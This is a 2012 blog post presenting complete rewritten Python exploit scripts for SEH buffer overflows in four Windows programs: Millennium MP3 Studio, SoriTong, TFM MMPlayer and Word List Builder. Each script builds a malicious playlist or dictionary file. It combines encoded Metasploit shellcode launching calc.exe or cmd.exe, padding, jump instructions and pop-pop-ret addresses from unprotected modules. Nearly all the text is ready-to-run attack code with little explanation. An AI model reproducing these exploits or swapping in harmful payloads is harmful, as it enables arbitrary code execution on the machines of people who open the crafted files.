
Sunday, September 2, 2012

Millennium MP3 Studio .mpf File Parsing SEH Overflow

The Millennium MP3 Studio version 1.0 is prone to a SEH overflow vulnerability. Processing specially-crafted .mpf files could trigger a SEH overwrite that could be leveraged further to gain arbitrary code execution. The exploit for this vulnerability has been documented at EDB: 9298

Here is a complete rewrite of this exploit:
from struct import *

file = "edb9298.mpf"    # output path; note this shadows the Python 2 builtin `file`

# msfpayload windows/exec CMD=calc.exe EXITFUNC=seh R | msfencode -b '\x00\x0a\x0d' -t perl
# [*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)

# Encoded payload bytes exactly as emitted by the command above (227 bytes);
# treated as an opaque blob here and never edited by hand.
calc = ("\xbb\x34\x46\x73\x3a\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x12\x83\xea\xfc\x03\x6e\x48\x91\xcf\x72" +
"\xbc\xdc\x30\x8a\x3d\xbf\xb9\x6f\x0c\xed\xde\xe4\x3d\x21" +
"\x94\xa8\xcd\xca\xf8\x58\x45\xbe\xd4\x6f\xee\x75\x03\x5e" +
"\xef\xbb\x8b\x0c\x33\xdd\x77\x4e\x60\x3d\x49\x81\x75\x3c" +
"\x8e\xff\x76\x6c\x47\x74\x24\x81\xec\xc8\xf5\xa0\x22\x47" +
"\x45\xdb\x47\x97\x32\x51\x49\xc7\xeb\xee\x01\xff\x80\xa9" +
"\xb1\xfe\x45\xaa\x8e\x49\xe1\x19\x64\x48\x23\x50\x85\x7b" +
"\x0b\x3f\xb8\xb4\x86\x41\xfc\x72\x79\x34\xf6\x81\x04\x4f" +
"\xcd\xf8\xd2\xda\xd0\x5a\x90\x7d\x31\x5b\x75\x1b\xb2\x57" +
"\x32\x6f\x9c\x7b\xc5\xbc\x96\x87\x4e\x43\x79\x0e\x14\x60" +
"\x5d\x4b\xce\x09\xc4\x31\xa1\x36\x16\x9d\x1e\x93\x5c\x0f" +
"\x4a\xa5\x3e\x45\x8d\x27\x45\x20\x8d\x37\x46\x02\xe6\x06" +
"\xcd\xcd\x71\x97\x04\xaa\x80\x66\x95\x26\x14\xd1\x4c\x0b" +
"\x78\xe2\xba\x4f\x85\x61\x4f\x2f\x72\x79\x3a\x2a\x3e\x3d" +
"\xd6\x46\x2f\xa8\xd8\xf5\x50\xf9\xba\x98\xc2\x61\x13\x3f" +
"\x63\x03\x6b")

# 50B jump to avoid CSEH and a 4B hole @ 0012F930
# jumps directly from nseh to nop sled > shellcode
junk = "A"*4112
nseh = pack ('<I', 0x909032EB)        # short jump 50B
cseh = pack ('<I', 0x1001FFC7)        # p/p/r 1001FFC7 xaudio.dll

nops = "\x90"*80

'''
# 8B jump to avoid CSEH and land in the first NOP sled of 12B
# another 8B jump from there to avoid a 4B hole @ 0012F930 and land in the final NOP sled > shellcode
junk = "A"*4112
nseh = pack ('<I', 0x909008EB)        # short jump 8B

cseh = pack ('<I', 0x1001FFC7)        # p/p/r 1001FFC7 xaudio.dll
nops = "\x90"*12
jump = pack ('<I', 0x909008EB)        # short jump 8B

nops2 = "\x90"*40
'''

# Final file layout, in order (sizes in bytes):
#        4112 4    4    80   227  = 4427 total
sploit = junk+nseh+cseh+nops+calc

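# Write the assembled buffer to disk and report its size.
# - binary mode so no newline translation can alter the byte layout
# - `with` closes the handle even if write() raises
# - only I/O errors are caught and the cause is printed; the original bare
#   `except:` also swallowed KeyboardInterrupt/SystemExit and hid the reason
# - print() with a single argument behaves the same under Python 2 and 3
try:
    with open (file, 'wb') as handle:
        handle.write (sploit)
    print ("[+] sploit ready: " + file + " (" + str (len (sploit)) + "B)")
except IOError as e:
    print ("[-] exception: " + str (e))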

# SafeSEH scanner output for xaudio.dll, the module the cseh address above
# comes from; kept as a bare string for reference only (it has no effect).
'''
/SafeSEH Module Scanner, item 30
 SEH mode=/SafeSEH OFF
 Base=0x10000000
 Limit=0x10044000
 Module version=3, 0, 7, 0
 Module Name=xaudio.dll
'''

SoriTong MP3 Player .m3u File Parsing SEH Overflow

SoriTong MP3 Player version 1.0 is prone to a SEH overflow vulnerability. Processing specially-crafted .m3u files could trigger a SEH overwrite that could be leveraged further to gain arbitrary code execution. The exploit for this vulnerability has been documented at EDB: 8624

Here is a complete rewrite of this exploit:
from struct import *

file = "edb8624.m3u"    # output path; note this shadows the Python 2 builtin `file`

# msfpayload windows/exec CMD=calc.exe EXITFUNC=seh R | msfencode -b '\x00\x0a\x0d' -t perl
# [*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)

# Encoded payload bytes exactly as emitted by the command above (227 bytes);
# treated as an opaque blob here and never edited by hand.
calc = ("\xbb\x34\x46\x73\x3a\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x12\x83\xea\xfc\x03\x6e\x48\x91\xcf\x72" +
"\xbc\xdc\x30\x8a\x3d\xbf\xb9\x6f\x0c\xed\xde\xe4\x3d\x21" +
"\x94\xa8\xcd\xca\xf8\x58\x45\xbe\xd4\x6f\xee\x75\x03\x5e" +
"\xef\xbb\x8b\x0c\x33\xdd\x77\x4e\x60\x3d\x49\x81\x75\x3c" +
"\x8e\xff\x76\x6c\x47\x74\x24\x81\xec\xc8\xf5\xa0\x22\x47" +
"\x45\xdb\x47\x97\x32\x51\x49\xc7\xeb\xee\x01\xff\x80\xa9" +
"\xb1\xfe\x45\xaa\x8e\x49\xe1\x19\x64\x48\x23\x50\x85\x7b" +
"\x0b\x3f\xb8\xb4\x86\x41\xfc\x72\x79\x34\xf6\x81\x04\x4f" +
"\xcd\xf8\xd2\xda\xd0\x5a\x90\x7d\x31\x5b\x75\x1b\xb2\x57" +
"\x32\x6f\x9c\x7b\xc5\xbc\x96\x87\x4e\x43\x79\x0e\x14\x60" +
"\x5d\x4b\xce\x09\xc4\x31\xa1\x36\x16\x9d\x1e\x93\x5c\x0f" +
"\x4a\xa5\x3e\x45\x8d\x27\x45\x20\x8d\x37\x46\x02\xe6\x06" +
"\xcd\xcd\x71\x97\x04\xaa\x80\x66\x95\x26\x14\xd1\x4c\x0b" +
"\x78\xe2\xba\x4f\x85\x61\x4f\x2f\x72\x79\x3a\x2a\x3e\x3d" +
"\xd6\x46\x2f\xa8\xd8\xf5\x50\xf9\xba\x98\xc2\x61\x13\x3f" +
"\x63\x03\x6b")

junk = "\xCC"*260                      # 260B of filler ahead of the SEH record
nseh = pack ('<I', 0x909032EB)         # short jump 50B
cseh = pack ('<I', 0x1001CFDA)         # p/p/r 1001CFDA Player.dll
nops = "\x90"*80

# Final file layout, in order (sizes in bytes):
#        260  4    4    80   227  = 575 total
sploit = junk+nseh+cseh+nops+calc

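# Write the assembled buffer to disk and report its size.
# - binary mode so no newline translation can alter the byte layout
# - `with` closes the handle even if write() raises
# - only I/O errors are caught and the cause is printed; the original bare
#   `except:` also swallowed KeyboardInterrupt/SystemExit and hid the reason
# - print() with a single argument behaves the same under Python 2 and 3
try:
    with open (file, 'wb') as handle:
        handle.write (sploit)
    print ("[+] sploit ready: " + file + " (" + str (len (sploit)) + "B)")
except IOError as e:
    print ("[-] exception: " + str (e))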

# SafeSEH scanner output for Player.dll, the module the cseh address above
# comes from; kept as a bare string for reference only (it has no effect).
'''
/SafeSEH Module Scanner, item 33
 SEH mode=/SafeSEH OFF
 Base=0x10000000
 Limit=0x10094000
 Module Name=Player.dll
'''

TFM MMPlayer .ppl File Parsing SEH Overflow

The TFM MMPlayer version 2.0 has a SEH overflow vulnerability. Processing specially-crafted .ppl files triggers a SEH overwrite that could be leveraged further to gain arbitrary code execution. The exploit for this vulnerability has been documented at EDB: 19176

Here is a complete rewrite of this exploit:
from struct import *

file = "edb19176.ppl"    # output path; note this shadows the Python 2 builtin `file`

# msfpayload windows/exec CMD=cmd.exe R | msfencode -b '\x00\x0a\x0d' -t perl
# [*] x86/shikata_ga_nai succeeded with size 226 (iteration=1)

# Encoded payload bytes exactly as emitted by the command above (226 bytes);
# treated as an opaque blob here and never edited by hand.
cmmd = ("\xda\xd5\xb8\x4f\xc1\x95\xae\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x32\x83\xc2\x04\x31\x42\x16\x03\x42\x16\xe2\xba\x3d" +
"\x7d\x27\x44\xbe\x7e\x58\xcd\x5b\x4f\x4a\xa9\x28\xe2\x5a" +
"\xba\x7d\x0f\x10\xee\x95\x84\x54\x26\x99\x2d\xd2\x10\x94" +
"\xae\xd2\x9c\x7a\x6c\x74\x60\x81\xa1\x56\x59\x4a\xb4\x97" +
"\x9e\xb7\x37\xc5\x77\xb3\xea\xfa\xfc\x81\x36\xfa\xd2\x8d" +
"\x07\x84\x57\x51\xf3\x3e\x56\x82\xac\x35\x10\x3a\xc6\x12" +
"\x80\x3b\x0b\x41\xfc\x72\x20\xb2\x77\x85\xe0\x8a\x78\xb7" +
"\xcc\x41\x47\x77\xc1\x98\x80\xb0\x3a\xef\xfa\xc2\xc7\xe8" +
"\x39\xb8\x13\x7c\xdf\x1a\xd7\x26\x3b\x9a\x34\xb0\xc8\x90" +
"\xf1\xb6\x96\xb4\x04\x1a\xad\xc1\x8d\x9d\x61\x40\xd5\xb9" +
"\xa5\x08\x8d\xa0\xfc\xf4\x60\xdc\x1e\x50\xdc\x78\x55\x73" +
"\x09\xfa\x34\x1e\xcc\x8e\x43\x67\xce\x90\x4b\xc8\xa7\xa1" +
"\xc0\x87\xb0\x3d\x03\xec\x4f\x74\x09\x45\xd8\xd1\xd8\xd7" +
"\x85\xe1\x37\x1b\xb0\x61\xbd\xe4\x47\x79\xb4\xe1\x0c\x3d" +
"\x25\x98\x1d\xa8\x49\x0f\x1d\xf9\x2a\xc2\x85\x2c\xc9\x64" +
"\x23\x31")

nop1 = "\x90"*3777
nop2 = "\x90"*100
jmp2 = "\xE9\xA8\xFD\xFF\xFF"             # near jump (back) 600B (0xFFFFFDA8)
nseh = pack ('<I', 0x9090C4EB)            # short jump (back) 60B (0xFFC4)
cseh = pack ('<I', 0x00401390)            # p/p/r 00401390 MMPlayer.exe

# Final file layout, in order (sizes in bytes); the payload sits before the
# SEH record here, unlike the two scripts above.
sploit = nop1+cmmd+nop2+jmp2+nseh+cseh
#        3777 226  100  5    4    4   = 4116 total

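# Write the assembled buffer to disk and report its size.
# - binary mode so no newline translation can alter the byte layout
# - `with` closes the handle even if write() raises
# - only I/O errors are caught and the cause is printed; the original bare
#   `except:` also swallowed KeyboardInterrupt/SystemExit and hid the reason
# - print() with a single argument behaves the same under Python 2 and 3
try:
    with open (file, 'wb') as handle:
        handle.write (sploit)
    print ("[+] sploit ready: " + file + " (" + str (len (sploit)) + "B)")
except IOError as e:
    print ("[-] exception: " + str (e))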

# SafeSEH scanner output for MMPlayer.exe, the module the cseh address above
# comes from; kept as a bare string for reference only (it has no effect).
'''
/SafeSEH Module Scanner, item 18
 SEH mode=/SafeSEH OFF
 Base=0x400000
 Limit=0x47c000
 Module version=2.2.0.30
 Module Name=MMPlayer.exe
'''

Word List Builder .dic File Parsing SEH Overflow

The Word List Builder version 1.0 has a SEH overflow vulnerability. Processing specially-crafted .dic dictionary files triggers a SEH overwrite that could be leveraged further to gain arbitrary code execution. The exploit for this vulnerability has been documented at EDB: 17086

Here is a complete rewrite of this exploit:
from struct import *

file = "edb17086.dic"    # output path; note this shadows the Python 2 builtin `file`

# msfpayload windows/exec CMD=cmd.exe R | msfencode -b '\x00\x0a\x0d' -t perl
# [*] x86/shikata_ga_nai succeeded with size 226 (iteration=1)

# Encoded payload bytes exactly as emitted by the command above (226 bytes);
# treated as an opaque blob here and never edited by hand.
cmmd = ("\xda\xd5\xb8\x4f\xc1\x95\xae\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x32\x83\xc2\x04\x31\x42\x16\x03\x42\x16\xe2\xba\x3d" +
"\x7d\x27\x44\xbe\x7e\x58\xcd\x5b\x4f\x4a\xa9\x28\xe2\x5a" +
"\xba\x7d\x0f\x10\xee\x95\x84\x54\x26\x99\x2d\xd2\x10\x94" +
"\xae\xd2\x9c\x7a\x6c\x74\x60\x81\xa1\x56\x59\x4a\xb4\x97" +
"\x9e\xb7\x37\xc5\x77\xb3\xea\xfa\xfc\x81\x36\xfa\xd2\x8d" +
"\x07\x84\x57\x51\xf3\x3e\x56\x82\xac\x35\x10\x3a\xc6\x12" +
"\x80\x3b\x0b\x41\xfc\x72\x20\xb2\x77\x85\xe0\x8a\x78\xb7" +
"\xcc\x41\x47\x77\xc1\x98\x80\xb0\x3a\xef\xfa\xc2\xc7\xe8" +
"\x39\xb8\x13\x7c\xdf\x1a\xd7\x26\x3b\x9a\x34\xb0\xc8\x90" +
"\xf1\xb6\x96\xb4\x04\x1a\xad\xc1\x8d\x9d\x61\x40\xd5\xb9" +
"\xa5\x08\x8d\xa0\xfc\xf4\x60\xdc\x1e\x50\xdc\x78\x55\x73" +
"\x09\xfa\x34\x1e\xcc\x8e\x43\x67\xce\x90\x4b\xc8\xa7\xa1" +
"\xc0\x87\xb0\x3d\x03\xec\x4f\x74\x09\x45\xd8\xd1\xd8\xd7" +
"\x85\xe1\x37\x1b\xb0\x61\xbd\xe4\x47\x79\xb4\xe1\x0c\x3d" +
"\x25\x98\x1d\xa8\x49\x0f\x1d\xf9\x2a\xc2\x85\x2c\xc9\x64" +
"\x23\x31")

nop1 = "\x90"*3777
nop2 = "\x90"*100
jmp2 = "\xE9\xA8\xFD\xFF\xFF"         # near jump (back) 600B (0xFFFFFDA8)
nseh = pack ('<I', 0x90909CEB)        # short jump (back) 100B (0xFF9C)
cseh = pack ('<I', 0x0040143C)        # p/p/r 0040143C Word_Builder.exe

# Final file layout, in order (sizes in bytes); same shape as the MMPlayer
# script above, differing only in the nseh jump distance and cseh address.
sploit = nop1+cmmd+nop2+jmp2+nseh+cseh
#        3777 226  100  5    4    4   = 4116 total

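# Write the assembled buffer to disk and report its size.
# - binary mode so no newline translation can alter the byte layout
# - `with` closes the handle even if write() raises
# - only I/O errors are caught and the cause is printed; the original bare
#   `except:` also swallowed KeyboardInterrupt/SystemExit and hid the reason
# - print() with a single argument behaves the same under Python 2 and 3
try:
    with open (file, 'wb') as handle:
        handle.write (sploit)
    print ("[+] sploit ready: " + file + " (" + str (len (sploit)) + "B)")
except IOError as e:
    print ("[-] exception: " + str (e))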